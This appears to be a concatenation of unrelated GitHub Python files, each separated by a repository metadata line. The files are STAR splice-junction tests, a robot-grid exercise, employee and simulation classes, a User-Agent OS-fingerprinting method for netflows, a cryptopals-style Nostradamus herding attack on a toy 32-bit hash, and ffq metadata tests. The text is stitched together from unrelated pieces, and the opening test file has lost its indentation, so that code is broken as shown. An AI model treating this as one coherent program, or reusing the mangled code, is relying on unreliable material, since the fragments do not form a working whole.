def test_read_sj_out_tab(sj_out_tab, simulated_unprocessed):
from outrigger.io.star import read_sj_out_tab
test = read_sj_out_tab(sj_out_tab)
csv = os.path.join(simulated_unprocessed, 'true_splice_junctions.csv')
true = pd.read_csv(csv)
assert (test.junction_start < test.junction_stop).all()
pdt.assert_frame_equal(test, true)
def test_int_to_intron_motif():
from outrigger.io.star import int_to_junction_motif
ints = [0, 1, 2, 3, 4, 5, 6]
test = [int_to_junction_motif(i) for i in ints]
true = ['non-canonical', 'GT/AG', 'GT/AG', 'GC/AG', 'GC/AG', 'AT/AC',
'AT/AC']
assert test == true
@pytest.fixture
def splice_junction_csv(ignore_multimapping, tasic2016_intermediate):
"""Different file depending on whether multimapping is True"""
template = os.path.join(tasic2016_intermediate,
'index', 'star',
'splice_junctions_ignore_multimapping{}.csv')
return template.format(str(ignore_multimapping))
def test_read_multiple_sj_out_tab(sj_filenames, ignore_multimapping,
splice_junction_csv):
from outrigger.io.star import read_multiple_sj_out_tab
from outrigger.common import READS
# Read csv file and convert to numeric
true = pd.read_csv(splice_junction_csv)
true = true.convert_objects()
test = read_multiple_sj_out_tab(
sj_filenames, ignore_multimapping=ignore_multimapping)
assert READS in test
pdt.assert_frame_equal(test, true)
def test_make_metadata(tasic2016_intermediate, junction_reads):
from outrigger.io.star import make_metadata
csv = os.path.join(tasic2016_intermediate, 'junction_metadata.csv')
true = pd.read_csv(csv)
test = make_metadata(junction_reads)
pdt.assert_frame_equal(test, true)
| YeoLab/outrigger | outrigger/tests/io/test_star.py | test_star.py | py | 2,952 | python | en | code | 60 | github-code | 36 |
19735072830 | #!/usr/bin/python3
from pyrob.api import *
@task(delay=0.05)
def task_4_11():
for i in range(6):
for j in range(13-i*2):
move_down()
move_right()
fill_cell()
for j in range(12-i*2):
move_left()
fill_cell()
move_up()
move_down()
move_left()
move_down()
move_right()
fill_cell()
move_down()
# move_right()
# move_down()
# for i in range(12):
# move_right()
# for j in range(13-i):
# fill_cell()
# move_down()
# move_right()
# for j in range(12-i):
# move_up()
# fill_cell()
# for i in range(13):
# move_right()
# move_down()
# fill_cell()
# for i in range(12):
# move_left()
# fill_cell()
# move_up()
if __name__ == '__main__':
run_tasks()
| miketoreno88/robot-tasks-master-Python | task_21.py | task_21.py | py | 965 | python | en | code | 0 | github-code | 36 |
11469300172 | class Simulation:
def __init__(self, simnNo, simDate, chipName, chipCount, chipCost):
self.simulationNumber = simnNo
self.simulationDate = simDate
self.chipName = chipName
self.chipCount = chipCount
self.chipCost = chipCost
self.simulationCost = self.chipCost * self.chipCount
def __str__(self):
new_str=""
new_str+= self.chipName
new_str += ": "
new_str += ("{0:03d}").format(self.simulationNumber)
new_str += ", "
new_str += self.simulationDate
new_str += ', $'
new_str += ("{0:06.2f}").format(self.simulationCost)
return new_str
class Employee:
def __init__(self, employeeName, employeeID):
self.employeeName = employeeName
self.employeeID = employeeID
self.simulationsDict = {}
def addSimulation(self, sim):
if sim.simulationNumber in self.simulationsDict.keys():
self.simulationsDict[sim.simulationNumber] = sim
else:
self.simulationsDict[sim.simulationNumber] = sim
def getSimulation(self, simNo):
if simNo in self.simulationsDict.keys():
return self.simulationsDict[simNo]
else:
return None
def __str__(self):
new_str=""
new_str+=self.employeeID
new_str+=", "
new_str+=self.employeeName
new_str+=": "
new_str+=("{0:02d}").format(len(self.simulationsDict))
new_str+= " Simulations"
return new_str
def getWorkload(self):
new_str=""
new_str+=str(self)
new_str+="\n"
i=0
new_list=[]
for element in self.simulationsDict.keys():
new_list.append(str(self.simulationsDict[element]))
new_list.sort()
for item in new_list:
new_str+=item
i+=1
if (i != len(self.simulationsDict.keys())):
new_str+="\n"
print(new_str)
return new_str
def addWorkload(self,fileName):
with open(fileName) as inputFile:
content = inputFile.readlines()
for line in content[2:]:
new_list = line.split()
conv=new_list[4]
new_list[4]=conv[1:]
thing=Simulation(int(new_list[0]),new_list[1],new_list[2],int(new_list[3]),float(new_list[4]))
self.addSimulation(thing)
class Facility:
def __init__(self, facilityName):
self.facilityName = facilityName
self.employeesDict = {}
def addEmployee(self, employee):
if employee.employeeName in self.employeesDict.keys():
self.employeesDict[employee.employeeName] = employee
else:
self.employeesDict[employee.employeeName] = employee
def getEmployees(self, *args):
new_list=[]
for value in args:
new_list.append(self.employeesDict[value])
return new_list
def __str__(self):
new_str=""
new_str+=self.facilityName+": "+("{0:02d}").format(len(self.employeesDict))+" Employees"
new_str+="\n"
i=0
new_list=[]
for element in self.employeesDict.keys():
new_list.append(str(self.employeesDict[element]))
print(new_list)
new_list.sort()
for item in new_list:
new_str+=item
i+=1
if (i != len(self.employeesDict.keys())):
new_str+="\n"
print(new_str)
return new_str
def getSimulation(self, simNo):
for employee in self.employeesDict:
emplvalue=self.employeesDict[employee]
for simabc in emplvalue.simulationsDict:
if simNo == emplvalue.simulationsDict[simabc].simulationNumber:
return emplvalue.simulationsDict[simNo]
return None
| arnavmittal/PythonAndSteganography | Lab07/Institute.py | Institute.py | py | 3,854 | python | en | code | 0 | github-code | 36 |
19033663462 | """OS identification method using netflows -- User-Agent
This module contains implementation of UserAgent class which is a method for OS
identification using User-Agent technique.
"""
import structlog
class UserAgent:
"""UserAgent OS identification technique
This class provides an interface for performing OS identification based on
netflow data.
"""
WIN_MAP = {'Windows 10.0': 'Windows 10',
'Windows 6.3': 'Windows 8.1',
'Windows 6.2': 'Windows 8',
'Windows 6.1': 'Windows 7',
'Windows 6.0': 'Windows Vista',
'Windows 5.2': 'Windows XP Professional x64',
'Windows 5.1': 'Windows XP',
'Windows 5.0': 'Windows 2000'}
API_MAP = {#'Android 1': 'Android 1.0',
#'Android 2': 'Android 1.1',
#'Android 3': 'Android 1.5',
#'Android 4': 'Android 1.6',
#'Android 5': 'Android 2.0',
#'Android 6': 'Android 2.0',
#'Android 7': 'Android 2.1',
#'Android 8': 'Android 2.2.x',
#'Android 9': 'Android 2.3',
'Android 10': 'Android 2.3',
'Android 11': 'Android 3.0',
'Android 12': 'Android 3.1',
'Android 13': 'Android 3.2',
'Android 14': 'Android 4.0',
'Android 15': 'Android 4.0',
'Android 16': 'Android 4.1',
'Android 17': 'Android 4.2',
'Android 18': 'Android 4.3',
'Android 19': 'Android 4.4',
'Android 21': 'Android 5.0',
'Android 22': 'Android 5.1',
'Android 23': 'Android 6.0',
'Android 24': 'Android 7.0',
'Android 25': 'Android 7.1',
'Android 26': 'Android 8.0',
'Android 27': 'Android 8.1',
'Android 28': 'Android 9'}
@classmethod
def convert_win(cls, os_name):
"""
Convert windows version to windows name
:param os: windows version
:return: windows name
"""
return cls.WIN_MAP.get(os_name, os_name)
@classmethod
def convert_api(cls, os_name):
"""
Convert Android API version to OS version
:param os: Android string with API version
:return: Android sring with OS version
"""
return cls.API_MAP.get(os_name, os_name)
def __init__(self, logger=structlog.get_logger()):
self.logger = logger.bind(method="useragent")
def run(self, flows):
"""Run the method on given flows
:param flows: flows to process
:return: dictionary between IPs and predicted operating systems
"""
self.logger.info("Method start")
result = {}
for flow in flows:
try:
if "sa" not in flow:
continue
sa = flow["sa"]
os_name = flow["hos"]
major = flow["hosmaj"]
minor = flow["hosmin"]
tmp = result.get(sa, {})
if os_name != "N/A":
if major != "N/A":
os_name += " " + major
if minor != "N/A":
os_name += "." + minor
os_name = self.convert_win(os_name)
os_name = self.convert_api(os_name)
tmp[os_name] = tmp.get(os_name, 0) + 1
if tmp:
result[sa] = tmp
except KeyError as e:
self.logger.warning('Flow is missing a necessary key!', key=str(e))
except Exception as e:
self.logger.warning(f'Exception while processing flow!', exception=str(e), flow=str(flow))
for sa in result:
total = sum(result[sa].values())
for os_name in result[sa].keys():
result[sa][os_name] /= total
self.logger.info("Method finish")
return result
| CSIRT-MU/CRUSOE | crusoe_observe/OS-parser-component/osrest/method/useragent.py | useragent.py | py | 4,053 | python | en | code | 9 | github-code | 36 |
72721112103 | from utilities import util
import binascii
# Challenge 54
STATE_LEN = 4 # 32 bits
BLOCK_SIZE = 16 # 128 bits
LEN_ENC_SIZE = 8 # 64 bits
initial_state = b''.join([util.int_to_bytes((37*i + 42) % 256) for i in range(STATE_LEN)])
# Notes
# - Hash functions are sometimes used as proof of a secret prediction. A
# naive forgery would require a second pre-image attack.
# - We (again) exploit the difference in difficulty between collisions
# and second pre-images for this attack. We also exploit the ability
# to precompute a lot of collisions.
# - We create a funnel-like structure to hash many possible initial states
# into one single final state
# - The dummy hash function we use here has the following properties:
# * 32 bit state
# * 128 bit block
# * 64 bit length encoding
# Finding a second pre-image requires 2^32 operations (considered
# infeasible in terms of programming competitions), but finding a
# collision requires only 2^16 operations, which is comparatively trivial.
# - If we have enough leaves in our funnel (say, 2^10 = 1024), finding
# a collision takes only 2^22 time.
# - We'll use the following list of spoilers below as our 'prediction'.
spoilers = b'''
* Snape kills Dumbledore
* Jon is the son of Rhaegar and Lyanna
* Rosebud was his childhood sled
* Kristin Shephard shot JR
* Verbal is Keyser Soze
* Soylent Green is people
'''
def length_padding(message):
length = len(message)
# first append an 01, and then enough 0's to make the length 8 mod 16
message = message + b'\x01'
k = (LEN_ENC_SIZE - len(message)) % BLOCK_SIZE
if k == 0:
k += BLOCK_SIZE
message = message + b'\x00' * k
# then append the original length of the message
message += length.to_bytes(LEN_ENC_SIZE, 'big')
return message
# merkle damgard construction using AES-128 as a compression function
def md_hash(message):
h = initial_state
M = length_padding(message)
for i in range(len(M) // BLOCK_SIZE):
Mi = util.get_ith_block(M, i, BLOCK_SIZE)
h = util.ecb_encrypt(Mi, util.padding(h, BLOCK_SIZE))[0:STATE_LEN]
return binascii.hexlify(h)
# instrumented md hash (no padding, can specify initial state)
def md_hash_instrumented(M, H = initial_state):
for i in range(len(M) // BLOCK_SIZE):
Mi = util.get_ith_block(M, i, BLOCK_SIZE)
H = util.ecb_encrypt(Mi, util.padding(H, BLOCK_SIZE))[0:STATE_LEN]
return binascii.hexlify(H)
# finds a message that hashes to any value in states.keys
# with initial state h
def find_second_preimage(h, states):
for m in range(pow(2, STATE_LEN * 8)):
message = m.to_bytes(BLOCK_SIZE, 'big')
m_hash = md_hash_instrumented(message, binascii.unhexlify(h))
if binascii.unhexlify(m_hash) in states:
return message, m_hash
return None, None
# finds two colliding blocks for a given initial state
def find_block_collision(h):
hash_table = {}
for m in range(pow(2, STATE_LEN * 8)):
message = m.to_bytes(BLOCK_SIZE, 'big')
m_hash = md_hash_instrumented(message)
if m_hash in hash_table:
return (hash_table[m_hash], message, m_hash)
hash_table[m_hash] = message
return None, None, None
# finds two colliding blocks each with its own initial state
def find_block_collision(h1, h2):
h1_table = {}
h2_table = {}
for m in range(pow(2, STATE_LEN * 8)):
message = m.to_bytes(BLOCK_SIZE, 'big')
m_hash1 = md_hash_instrumented(message, h1)
m_hash2 = md_hash_instrumented(message, h2)
if m_hash1 in h2_table:
return (message, h2_table[m_hash1], m_hash1)
else:
h1_table[m_hash1] = message
if m_hash2 in h1_table:
return (h1_table[m_hash2], message, m_hash2)
else:
h2_table[m_hash2] = message
return None, None, None
# generates a funnel (binary tree) with depth k
def generate_funnel(k):
# the structure of the funnel will be two lists of length k
# the ith element of the lists will be a list of length 2^(k - i)
# the jth element of that list will be either the hash state or the data
# depending on the list
funnel_data = []
funnel_hash = []
# the initial states will be the 32 bit encodings
# of the numbers 0 to 2^k - 1
funnel_hash.append([])
for i in range(1 << k):
funnel_hash[0].append(i.to_bytes(STATE_LEN, 'big'))
for i in range(k):
funnel_data.append([])
funnel_hash.append([])
for j in range(1 << (k - i - 1)):
init_state0 = funnel_hash[i][j*2]
init_state1 = funnel_hash[i][j*2 + 1]
d0, d1, h = find_block_collision(init_state0, init_state1)
assert md_hash_instrumented(d0, init_state0) == md_hash_instrumented(d1, init_state1)
funnel_data[i].append(d0)
funnel_data[i].append(d1)
funnel_hash[i + 1].append(binascii.unhexlify(h))
return funnel_data, funnel_hash
if __name__ == '__main__':
# generate the funnel
k = 10
funnel_data, funnel_hash = generate_funnel(k)
# let's say our spoilers fit inside 11 blocks
spoiler_blocks = 11
message_length = (spoiler_blocks + 1 + k) * BLOCK_SIZE
dummy_message = b'\x00' * message_length
padded_message = length_padding(dummy_message)
padding_block = padded_message[message_length:]
# generate prediction hash
h_pred = md_hash_instrumented(padding_block, funnel_hash[k][0])
print('Hash of prediction: {}'.format(h_pred.decode('utf-8')))
print('... time passes ...')
# construct spoiler message
spoiler_message = spoilers + b' ' * (BLOCK_SIZE - (len(spoilers) % BLOCK_SIZE))
h_spoiler = md_hash_instrumented(spoiler_message, initial_state)
glue, h_funnel_leaf = find_second_preimage(h_spoiler, funnel_hash[0])
funnel_index = int(h_funnel_leaf, 16)
suffix = b''
for i in range(k):
suffix += funnel_data[i][funnel_index]
funnel_index >>= 1
final_message = spoiler_message + glue + suffix
print('Prediction:')
print(final_message)
message_hash = md_hash(final_message)
print('Message hash: {}'.format(message_hash.decode('utf-8')))
assert message_hash == h_pred
print('Success!')
| fortenforge/cryptopals | challenges/nostradamus_attack.py | nostradamus_attack.py | py | 6,007 | python | en | code | 13 | github-code | 36 |
70415685225 | import sys
from io import StringIO
from unittest import mock, TestCase
from unittest.mock import call, patch
from bs4 import BeautifulSoup
import ffq.ffq as ffq
from tests.mixins import TestMixin
from ffq.main import main
from ffq import __version__
class TestFfq(TestMixin, TestCase):
def test_validate_accessions(self):
SEARCH_TYPES = (
"SRR",
"ERR",
"DRR",
"SRP",
"ERP",
"DRP",
"SRX",
"GSE",
"GSM",
"DOI",
)
self.assertEqual(
[
{
"accession": "SRR244234",
"prefix": "SRR",
"valid": True,
"error": None,
},
{
"accession": "SRT44322",
"prefix": "UNKNOWN",
"valid": False,
"error": None,
},
{
"accession": "10.1016/J.CELL.2018.06.052",
"prefix": "DOI",
"valid": True,
"error": None,
},
{
"accession": "ASA10.1016/J.CELL.2018.06.052",
"prefix": "UNKNOWN", # TODO better DOI error handling
"valid": False,
"error": None,
},
{
"accession": "GSM12345",
"prefix": "GSM",
"valid": True,
"error": None,
},
{
"accession": "GSE567890",
"prefix": "GSE",
"valid": True,
"error": None,
},
],
ffq.validate_accessions(
[
"SRR244234",
"SRT44322",
"10.1016/j.cell.2018.06.052",
"ASA10.1016/j.cell.2018.06.052",
"GSM12345",
"GSE567890",
],
SEARCH_TYPES,
),
)
def test_parse_run(self):
self.maxDiff = None
with mock.patch(
"ffq.ffq.get_files_metadata_from_run"
) as get_files_metadata_from_run, mock.patch(
"ffq.ffq.ncbi_fetch_fasta"
) as ncbi_fetch_fasta, mock.patch(
"ffq.ffq.parse_ncbi_fetch_fasta"
) as parse_ncbi_fetch_fasta:
with open(self.run_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
get_files_metadata_from_run.return_value = []
ncbi_fetch_fasta.return_value = []
parse_ncbi_fetch_fasta.return_value = []
self.assertEqual(
{
"accession": "SRR8426358",
"experiment": "SRX5234128",
"study": "SRP178136",
"sample": "SRS4237519",
"title": "Illumina HiSeq 4000 paired end sequencing; GSM3557675: old_Dropseq_1; Mus musculus; RNA-Seq",
"attributes": {
"ENA-SPOT-COUNT": 109256158,
"ENA-BASE-COUNT": 21984096610,
"ENA-FIRST-PUBLIC": "2019-01-27",
"ENA-LAST-UPDATE": "2019-01-27",
},
"files": {"aws": [], "ftp": [], "gcp": [], "ncbi": []},
},
ffq.parse_run(soup),
)
def test_parse_run_bam(self):
with open(self.run2_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
self.maxDiff = None
self.assertEqual(
{
"accession": "SRR6835844",
"attributes": {
"ENA-BASE-COUNT": 12398988240,
"ENA-FIRST-PUBLIC": "2018-03-30",
"ENA-LAST-UPDATE": "2018-03-30",
"ENA-SPOT-COUNT": 137766536,
"assembly": "mm10",
"dangling_references": "treat_as_unmapped",
},
"experiment": "SRX3791763",
"files": {
"ftp": [
{
"accession": "SRR6835844",
"filename": "10X_P4_0.bam",
"filetype": "bam",
"filesize": 17093057664,
"filenumber": 1,
"md5": "5355fe6a07155026085ce46631268ab1",
"urltype": "ftp",
"url": "ftp://ftp.sra.ebi.ac.uk/vol1/SRA653/SRA653146/bam/10X_P4_0.bam",
}
],
"aws": [
{
"accession": "SRR6835844",
"filename": "10X_P4_0.bam.1",
"filetype": "bam",
"filesize": None,
"filenumber": 1,
"md5": None,
"urltype": "aws",
"url": "https://sra-pub-src-1.s3.amazonaws.com/SRR6835844/10X_P4_0.bam.1",
},
{
"accession": "SRR6835844",
"filename": "SRR6835844",
"filenumber": 1,
"filesize": None,
"filetype": "sra",
"md5": None,
"url": "https://sra-pub-run-odp.s3.amazonaws.com/sra/SRR6835844/SRR6835844",
"urltype": "aws",
},
],
"gcp": [
{
"accession": "SRR6835844",
"filename": "10X_P4_0.bam.1",
"filetype": "bam",
"filesize": None,
"filenumber": 1,
"md5": None,
"urltype": "gcp",
"url": "gs://sra-pub-src-1/SRR6835844/10X_P4_0.bam.1",
},
{
"accession": "SRR6835844",
"filename": "SRR6835844.1",
"filenumber": 1,
"filesize": None,
"filetype": "sra",
"md5": None,
"url": "gs://sra-pub-crun-7/SRR6835844/SRR6835844.1",
"urltype": "gcp",
},
],
"ncbi": [],
},
"sample": "SRS3044236",
"study": "SRP131661",
"title": "Illumina NovaSeq 6000 sequencing; GSM3040890: library 10X_P4_0; Mus musculus; RNA-Seq",
},
ffq.parse_run(soup),
)
def test_parse_sample(self):
with open(self.sample_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
self.assertEqual(
{
"accession": "SRS4237519",
"title": "old_Dropseq_1",
"organism": "Mus musculus",
"attributes": {
"source_name": "Whole lung",
"tissue": "Whole lung",
"age": "24 months",
"number of cells": "799",
"ENA-SPOT-COUNT": 109256158,
"ENA-BASE-COUNT": 21984096610,
"ENA-FIRST-PUBLIC": "2019-01-11",
"ENA-LAST-UPDATE": "2019-01-11",
},
"experiments": "SRX5234128",
},
ffq.parse_sample(soup),
)
def test_parse_experiment_with_run(self):
with open(self.experiment_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
self.maxDiff = None
self.assertEqual(
{
"accession": "SRX3517583",
"instrument": "HiSeq X Ten",
"platform": "ILLUMINA",
"runs": {
"SRR6425163": {
"accession": "SRR6425163",
"attributes": {
"ENA-BASE-COUNT": 74994708900,
"ENA-FIRST-PUBLIC": "2017-12-30",
"ENA-LAST-UPDATE": "2017-12-30",
"ENA-SPOT-COUNT": 249982363,
},
"experiment": "SRX3517583",
"files": {
"aws": [
{
"accession": "SRR6425163",
"filename": "J2_S1_L001_R1_001.fastq.gz",
"filenumber": 1,
"filesize": None,
"filetype": "fastq",
"md5": None,
"url": "s3://sra-pub-src-6/SRR6425163/J2_S1_L001_R1_001.fastq.gz",
"urltype": "aws",
},
{
"accession": "SRR6425163",
"filename": "J2_S1_L001_R2_001.fastq.gz",
"filenumber": 2,
"filesize": None,
"filetype": "fastq",
"md5": None,
"url": "s3://sra-pub-src-6/SRR6425163/J2_S1_L001_R2_001.fastq.gz",
"urltype": "aws",
},
{
"accession": "SRR6425163",
"filename": "SRR6425163",
"filenumber": 1,
"filesize": None,
"filetype": "sra",
"md5": None,
"url": "https://sra-pub-run-odp.s3.amazonaws.com/sra/SRR6425163/SRR6425163",
"urltype": "aws",
},
],
"ftp": [
{
"accession": "SRR6425163",
"filename": "SRR6425163_1.fastq.gz",
"filenumber": 1,
"filesize": 21858866426,
"filetype": "fastq",
"md5": "2dcf9ae4cfb30ec0aaf06edf0e3ca49a",
"url": "ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR642/003/SRR6425163/SRR6425163_1.fastq.gz",
"urltype": "ftp",
},
{
"accession": "SRR6425163",
"filename": "SRR6425163_2.fastq.gz",
"filenumber": 2,
"filesize": 22946392178,
"filetype": "fastq",
"md5": "1d0703967a2331527a3aebf97a3f1c32",
"url": "ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR642/003/SRR6425163/SRR6425163_2.fastq.gz",
"urltype": "ftp",
},
],
"gcp": [
{
"accession": "SRR6425163",
"filename": "J2_S1_L001_R1_001.fastq.gz",
"filenumber": 1,
"filesize": None,
"filetype": "fastq",
"md5": None,
"url": "gs://sra-pub-src-6/SRR6425163/J2_S1_L001_R1_001.fastq.gz",
"urltype": "gcp",
},
{
"accession": "SRR6425163",
"filename": "J2_S1_L001_R2_001.fastq.gz",
"filenumber": 2,
"filesize": None,
"filetype": "fastq",
"md5": None,
"url": "gs://sra-pub-src-6/SRR6425163/J2_S1_L001_R2_001.fastq.gz",
"urltype": "gcp",
},
{
"accession": "SRR6425163",
"filename": "SRR6425163.1",
"filenumber": 1,
"filesize": None,
"filetype": "sra",
"md5": None,
"url": "gs://sra-pub-crun-7/SRR6425163/SRR6425163.1",
"urltype": "gcp",
},
],
"ncbi": [],
},
"sample": "SRS2792433",
"study": "SRP127624",
"title": "HiSeq X Ten paired end sequencing; GSM2905292: BMPa-1; Homo sapiens; RNA-Seq",
}
},
"title": "HiSeq X Ten paired end sequencing; GSM2905292: BMPa-1; Homo sapiens; RNA-Seq",
},
ffq.parse_experiment_with_run(soup, 10),
)
def test_parse_study(self):
with open(self.study_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
self.assertEqual(
{
"accession": "SRP178136",
"title": "Multi-modal analysis of the aging mouse lung at cellular resolution",
"abstract": "A) Whole lung tissue from 24 months (n=7) "
"and 3 months old (n=8) mice was dissociated and single-cell "
"mRNAseq libraries generated with Drop-Seq. B) Bulk RNA-seq "
"data was generated from whole mouse lung tissue of old (n=3) "
"and young (n=3) samples. C) Bulk RNA-seq data was generated "
"from flow-sorted macrophages from old (n=7) and young (n=5) "
"mice and flow-sorted epithelial cells from old (n=4) and "
"young (n=4) mice. Overall design: Integration of bulk RNA-seq "
"from whole mouse lung tissue and bulk RNA-seq from flow-sorted "
"lung macrophages and epithelial cells was used to validate results "
"obtained from single cell RNA-seq of whole lung tissue.",
"accession": "SRP178136",
},
ffq.parse_study(soup),
)
def test_gse_search_json(self):
with open(self.gse_search_path, "r") as f:
soup = BeautifulSoup(f.read(), "html.parser")
self.assertEqual(
{"accession": "GSE93374", "geo_id": "200093374"},
ffq.parse_gse_search(soup),
)
def test_gse_summary_json(self):
with open(self.gse_summary_path, "r") as f:
soup = BeautifulSoup(f.read(), "html.parser")
self.assertEqual({"accession": "SRP096361"}, ffq.parse_gse_summary(soup))
def test_ffq_gse(self):
# Need to figure out how to add for loop test for adding individual runs
with mock.patch(
"ffq.ffq.get_gse_search_json"
) as get_gse_search_json, mock.patch(
"ffq.ffq.parse_gse_search"
) as parse_gse_search, mock.patch(
"ffq.ffq.gse_to_gsms"
) as gse_to_gsms, mock.patch(
"ffq.ffq.ffq_gsm"
) as ffq_gsm, mock.patch(
"ffq.ffq.geo_to_suppl"
) as geo_to_suppl:
parse_gse_search.return_value = {"accession": "GSE1", "geo_id": "GEOID1"}
gse_to_gsms.return_value = ["GSM_1", "GSM_2"]
geo_to_suppl.return_value = {
"filename": "file",
"size": "size",
"url": "url",
}
ffq_gsm.side_effect = [
{"accession": "GSM1"},
{"accession": "GSM2"},
"test",
"test",
]
self.assertEqual(
{
"accession": "GSE1",
"supplementary_files": {
"filename": "file",
"size": "size",
"url": "url",
},
"geo_samples": {
"GSM1": {"accession": "GSM1"},
"GSM2": {"accession": "GSM2"},
},
},
ffq.ffq_gse("GSE1"),
)
get_gse_search_json.assert_called_once_with("GSE1")
gse_to_gsms.assert_called_once_with("GSE1")
ffq_gsm.assert_has_calls([call("GSM_1", None), call("GSM_2", None)])
def test_ffq_gsm(self):
# Need to figure out how to add for loop test for adding individual runs
with mock.patch(
"ffq.ffq.get_gsm_search_json"
) as get_gsm_search_json, mock.patch(
"ffq.ffq.geo_to_suppl"
) as geo_to_suppl, mock.patch(
"ffq.ffq.gsm_to_platform"
) as gsm_to_platform, mock.patch(
"ffq.ffq.gsm_id_to_srs"
) as gsm_id_to_srs, mock.patch(
"ffq.ffq.ffq_sample"
) as ffq_sample:
get_gsm_search_json.return_value = {"accession": "GSM1", "geo_id": "GSMID1"}
geo_to_suppl.return_value = {"supplementary_files": "supp"}
gsm_to_platform.return_value = {"platform": "platform"}
gsm_id_to_srs.return_value = "SRS1"
ffq_sample.return_value = {"accession": "SRS1"}
self.assertEqual(
{
"accession": "GSM1",
"supplementary_files": {"supplementary_files": "supp"},
"platform": "platform",
"samples": {"SRS1": {"accession": "SRS1"}},
},
ffq.ffq_gsm("GSM1"),
)
get_gsm_search_json.assert_called_once_with("GSM1")
geo_to_suppl.assert_called_once_with("GSM1", "GSM")
gsm_to_platform.assert_called_once_with("GSM1")
gsm_id_to_srs.assert_called_once_with("GSMID1")
ffq_sample.assert_called_once_with("SRS1", None)
def test_ffq_run(self):
with mock.patch("ffq.ffq.get_xml") as get_xml, mock.patch(
"ffq.ffq.parse_run"
) as parse_run:
run = mock.MagicMock()
parse_run.return_value = run
self.assertEqual(run, ffq.ffq_run("SRR8426358"))
get_xml.assert_called_once_with("SRR8426358")
def test_ffq_study(self):
with mock.patch("ffq.ffq.get_xml") as get_xml, mock.patch(
"ffq.ffq.parse_study"
) as parse_study, mock.patch("ffq.ffq.ffq_sample") as ffq_sample, mock.patch(
"ffq.ffq.get_samples_from_study"
) as get_samples_from_study:
parse_study.return_value = {"study": "study_id"}
get_samples_from_study.return_value = ["sample_id1", "sample_id2"]
ffq_sample.side_effect = [{"accession": "id1"}, {"accession": "id2"}]
self.assertEqual(
{
"study": "study_id",
"samples": {
"id1": {"accession": "id1"},
"id2": {"accession": "id2"},
},
},
ffq.ffq_study("SRP226764"),
)
get_xml.assert_called_once_with("SRP226764")
self.assertEqual(2, ffq_sample.call_count)
ffq_sample.assert_has_calls(
[call("sample_id1", None), call("sample_id2", None)]
)
def test_ffq_experiment(self):
with mock.patch("ffq.ffq.get_xml") as get_xml, mock.patch(
"ffq.ffq.parse_experiment_with_run"
) as parse_experiment_with_run:
parse_experiment_with_run.return_value = {
"experiments": "experiment",
"runs": {"run": "run"},
}
self.assertEqual(
{"experiments": "experiment", "runs": {"run": "run"}},
ffq.ffq_experiment("SRX7048194"),
)
get_xml.assert_called_once_with("SRX7048194")
# Do one per accession, simply asserting equal to the expected list of links.
# def test_ffq_links_gse_ftp(self):
# self.maxDiff = None
# capturedOutput = io.StringIO()
# sys.stdout = capturedOutput
# ffq.ffq_links([('GSE', 'GSE112570')], 'ftp')
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# (
# 'accession\tfiletype\tfilenumber\tlink\n'
# 'GSM3073088\t\tbam\t1\tftp://ftp.sra.ebi.ac.uk/vol1/SRA678/SRA678017/bam/H17w_K1.bam\n' # noqa
# 'GSM3073089\t\tbam\t1\tftp://ftp.sra.ebi.ac.uk/vol1/SRA678/SRA678017/bam/H17w_K2.bam\n' # noqa
# )
# )
# def test_ffq_links_srs_ftp(self):
# capturedOutput = io.StringIO() # Create StringIO object
# sys.stdout = capturedOutput # and redirect stdout.
# ffq.ffq_links([('SRS', 'SRS4629239')], 'ftp') # Call function.
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# 'ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR890/000/SRR8903510/SRR8903510.fastq.gz '
# )
# def test_ffq_links_gsm_aws(self):
# capturedOutput = io.StringIO()
# sys.stdout = capturedOutput
# ffq.ffq_links([('GSM', 'GSM3396164')], 'AWS')
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# 'https://sra-pub-src-1.s3.amazonaws.com/SRR7881402/possorted_genome_bam_Ck.bam.1 '
# )
# def test_ffq_links_srr_gcp(self):
# capturedOutput = io.StringIO()
# sys.stdout = capturedOutput
# ffq.ffq_links([('SRR', 'SRR8327928')], 'GCP')
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# 'gs://sra-pub-src-1/SRR8327928/PDX110_possorted_genome_bam.bam.1 '
# )
# def test_ffq_links_srx_ncbi(self):
# capturedOutput = io.StringIO()
# sys.stdout = capturedOutput
# ffq.ffq_links([('SRX', 'SRX4063411')], 'NCBI')
# sys.stdout = sys.__stdout__
# self.assertEqual(
# capturedOutput.getvalue(),
# 'https://sra-downloadb.be-md.ncbi.nlm.nih.gov/sos2/sra-pub-run-13/SRR7142647/SRR7142647.1 '
# )
def test_ffq_doi(self):
with mock.patch("ffq.ffq.get_doi") as get_doi, mock.patch(
"ffq.ffq.search_ena_title"
) as search_ena_title, mock.patch("ffq.ffq.ffq_study") as ffq_study:
get_doi.return_value = {"title": ["title"]}
search_ena_title.return_value = ["SRP1"]
self.assertEqual([ffq_study.return_value], ffq.ffq_doi("doi"))
get_doi.assert_called_once_with("doi")
search_ena_title.assert_called_once_with("title")
ffq_study.assert_called_once_with("SRP1", None)
def test_ffq_doi_no_title(self):
with mock.patch("ffq.ffq.get_doi") as get_doi, mock.patch(
"ffq.ffq.search_ena_title"
) as search_ena_title, mock.patch(
"ffq.ffq.ncbi_search"
) as ncbi_search, mock.patch(
"ffq.ffq.ncbi_link"
) as ncbi_link, mock.patch(
"ffq.ffq.geo_ids_to_gses"
) as geo_ids_to_gses, mock.patch(
"ffq.ffq.ffq_gse"
) as ffq_gse:
get_doi.return_value = {"title": ["title"]}
search_ena_title.return_value = []
ncbi_search.return_value = ["PMID1"]
ncbi_link.return_value = ["GEOID1"]
geo_ids_to_gses.return_value = ["GSE1"]
self.assertEqual([ffq_gse.return_value], ffq.ffq_doi("doi"))
get_doi.assert_called_once_with("doi")
search_ena_title.assert_called_once_with("title")
ncbi_search.assert_called_once_with("pubmed", "doi")
ncbi_link.assert_called_once_with("pubmed", "gds", "PMID1")
geo_ids_to_gses.assert_called_once_with(["GEOID1"])
